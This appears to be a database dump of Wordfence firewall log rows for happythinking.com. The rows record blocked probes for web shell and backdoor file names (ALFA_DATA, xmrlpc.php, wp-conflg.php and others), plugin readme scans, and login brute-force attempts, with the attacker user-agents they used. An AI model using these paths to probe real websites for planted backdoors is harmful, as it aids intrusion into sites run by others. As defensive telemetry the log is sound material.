(50717, 1711858489.029630, 1711858487.224000, '\0\0\0\0\0\0\0\0\0\0ÿÿ€Çöª', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins/content/apismtp/apismtp.php.suspected?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhwLnN1c3BlY3RlZA==","category":"brute-force","ssl":1}'),
(51715, 1712368118.404695, 1712368118.100100, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/social-warfare/readme.txt', NULL, 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:85.0) Gecko/20100101 Firefox/85.0', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtd2FyZmFyZS9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9zb2NpYWwtd2FyZmFyZS9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(50926, 1712082471.148497, 1712082470.719000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü€', 0, 403, 0, 0, 0, 'https://happythinking.com/ae.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FlLnBocA==","category":"brute-force","ssl":1}'),
(50634, 1711731939.227783, 1711731938.856000, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/css/colors/coffee/xmrlpc.php?p=', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vY3NzL2NvbG9ycy9jb2ZmZWUveG1ybHBjLnBocA==","category":"brute-force","ssl":1}'),
(51936, 1712637457.689072, 1712637457.265200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(51459, 0.000000, 1712320688.160792, '\0\0\0\0\0\0\0\0\0\0ÿÿ)BõÞ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50271, 0.000000, 1711073605.595250, '\0\0\0\0\0\0\0\0\0\0ÿÿ-ž&', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50272, 0.000000, 1711073612.150654, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\Íñ', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50273, 0.000000, 1711073630.922528, '\0\0\0\0\0\0\0\0\0\0ÿÿw\Z-', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50274, 0.000000, 1711073877.123511, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50275, 0.000000, 1711074637.168241, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50276, 0.000000, 1711075396.850769, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50277, 0.000000, 1711076148.240198, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50278, 0.000000, 1711076909.810493, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50279, 0.000000, 1711077657.096945, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50280, 0.000000, 1711078406.001519, '\0\0\0\0\0\0\0\0\0\0ÿÿ£@E', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(50851, 1712062372.154877, 1712062371.828700, '\0\0\0\0\0\0\0\0\0\0ÿÿãpç', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50662, 1711731892.019047, 1711731891.575400, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹c>o', 0, 403, 0, 0, 0, 'https://www.happythinking.com///wp-admin/ajax-actions.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Ly8vd3AtYWRtaW4vYWpheC1hY3Rpb25zLnBocA==","category":"brute-force","ssl":1}'),
(51717, 1712368116.404535, 1712368116.050400, '\0\0\0\0\0\0\0\0\0\0ÿÿCÍˆ9', 0, 200, 0, 0, 0, 'https://www.happythinking.com/wp-content/plugins/wp-simple-cart/readme.txt', NULL, 'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.3) Gecko/20070309 Firefox/52.0.2', 'logged:waf', 'Readme.txt and debug.log scans', '{"learningMode":0,"failedRules":"logged|500","paramKey":"cmVxdWVzdC51cmk=","paramValue":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zaW1wbGUtY2FydC9yZWFkbWUudHh0","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zaW1wbGUtY2FydC9yZWFkbWUudHh0","category":"discovery-and-probing","ssl":1}'),
(50684, 1711791830.135412, 1711791829.044000, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇÉ', 0, 403, 0, 0, 0, 'https://happythinking.com/ALFA_DATA/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L0FMRkFfREFUQS9hbGZhY2dpYXBpL3BlcmwuYWxmYQ==","category":"brute-force","ssl":1}'),
(51922, 1712636714.876761, 1712636714.533100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/lv.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x2LnBocA==","category":"brute-force","ssl":1}'),
(51996, 1712689359.344789, 1712689358.972400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/seo.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3Nlby5waHA=","category":"brute-force","ssl":1}'),
(51923, 1712636705.321850, 1712636704.882100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/inc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luYy5waHA=","category":"brute-force","ssl":1}'),
(51920, 1712636751.489895, 1712636751.163000, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3gucGhw","category":"brute-force","ssl":1}'),
(51997, 1712689352.506070, 1712689352.133600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/lv.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x2LnBocA==","category":"brute-force","ssl":1}'),
(51909, 1712636934.893677, 1712636934.543400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/simple.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(51918, 1712636780.490449, 1712636780.070700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/about.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Fib3V0LnBocA==","category":"brute-force","ssl":1}'),
(52054, 1712761773.315227, 1712761772.444100, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/lv.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2x2LnBocA==","category":"brute-force","ssl":1}'),
(51919, 1712636766.877322, 1712636766.500700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/b0x.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2IweC5waHA=","category":"brute-force","ssl":1}'),
(51917, 1712636795.742087, 1712636795.450600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/cloud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nsb3VkLnBocA==","category":"brute-force","ssl":1}'),
(51998, 1712689346.249432, 1712689345.865800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/inc.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luYy5waHA=","category":"brute-force","ssl":1}'),
(51898, 1712637110.736394, 1712637110.346700, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(51899, 1712637088.411269, 1712637088.099900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-conflg.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbmZsZy5waHA=","category":"brute-force","ssl":1}'),
(51900, 1712637074.612076, 1712637074.274200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/wp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLnBocA==","category":"brute-force","ssl":1}'),
(52049, 1712761894.285241, 1712761893.864500, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üW', 0, 403, 0, 0, 0, 'https://www.happythinking.com/cloud.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Nsb3VkLnBocA==","category":"brute-force","ssl":1}'),
(52005, 1712689934.737727, 1712689934.383800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\üŽ', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/classsmtps.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2NsYXNzc210cHMucGhw","category":"brute-force","ssl":1}'),
(51901, 1712637063.117440, 1712637062.785200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ü', 0, 403, 0, 0, 0, 'https://happythinking.com/upfile.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3VwZmlsZS5waHA=","category":"brute-force","ssl":1}'),
